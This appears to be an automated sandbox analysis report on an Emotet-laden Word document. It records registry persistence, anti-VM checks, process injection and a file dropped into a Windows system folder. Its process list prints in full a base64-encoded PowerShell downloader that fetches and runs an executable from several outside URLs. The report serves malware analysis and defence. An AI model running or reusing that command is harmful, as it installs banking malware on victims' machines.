efd27a7b656f92567e0183f540f50890ae04fca8ac025188d90054d560af0bcb

Analysis

max time kernel
144s
max time network
147s
resource
win10

Sharing

Copy URL

Twitter E-mail

General

Target

Docs_a951ad8253edcb05a2bd618d6d38d562.4
Sample

191011-g8hxtvqwln
SHA256

efd27a7b656f92567e0183f540f50890ae04fca8ac025188d90054d560af0bcb

Score

N/A

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	Process
13703	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
13703	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
14984	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_a951ad8253edcb05a2bd618d6d38d562.4.doc	WINWORD.EXE
16609	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_a951ad8253edcb05a2bd618d6d38d562.4.doc	WINWORD.EXE

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
14672	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
14672	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
14672	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
14672	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
14672	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
14672	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
14672	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
14672	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
14672	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

SppExtComObj.exepowershell.exe877.exetabletmspterm.exe

at	description	Process	procid_target
19250	PID 3988 wrote to memory of 3848	SppExtComObj.exe	42
34750	PID 3584 wrote to memory of 3336	powershell.exe	46
35047	PID 3336 wrote to memory of 3300	877.exe	47
42562	PID 3132 wrote to memory of 812	tabletmspterm.exe	49

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at	description	Process
24734	Token: SeDebugPrivilege	powershell.exe

Suspicious behavior: EnumeratesProcesses

Modifies registry class 1 TTPs 84 IoCs

persistence

Modify Registry

T1112

Processes:

877.exe877.exetabletmspterm.exe

at	description	ioc	Process
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	877.exe
34937	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	877.exe
34937	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	877.exe
35140	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
35140	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	877.exe
35156	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
35156	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	877.exe
35156	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	877.exe
35156	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	877.exe
35156	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	877.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	tabletmspterm.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,0"	tabletmspterm.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	tabletmspterm.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	tabletmspterm.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	tabletmspterm.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
42422	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	tabletmspterm.exe
42422	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
42437	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	tabletmspterm.exe
42437	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
42437	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	tabletmspterm.exe
42437	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	tabletmspterm.exe
42437	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	tabletmspterm.exe
42437	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE,0"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Windows\\SysWOW64\\TABLET~1.EXE /dde"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	tabletmspterm.exe
42672	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	tabletmspterm.exe
42672	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	tabletmspterm.exe

Emotet Sync 1 IoCs

trojan banker

Processes:

877.exe

description	ioc	Process
Event created	Global\E145925EC	877.exe

Suspicious behavior: EmotetMutantsSpam

Drops file in system dir 7 IoCs

Processes:

877.exetabletmspterm.exe

at	description	ioc	Process
41047	File renamed	C:\Users\Admin\877.exe => C:\Windows\SysWOW64\tabletmspterm.exe	877.exe
59484	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe
59531	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
59562	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
59562	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tabletmspterm.exe
59656	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tabletmspterm.exe
59672	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	tabletmspterm.exe

emotet family
family

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_a951ad8253edcb05a2bd618d6d38d562.4.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3708

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA=
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Users\Admin\877.exe
"C:\Users\Admin\877.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:3336

C:\Users\Admin\877.exe
--406b0556
1⤵
- Modifies registry class
- Emotet Sync
- Drops file in system dir
PID:3300

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:3132

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Drops file in system dir
PID:812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/812-8-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3300-5-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download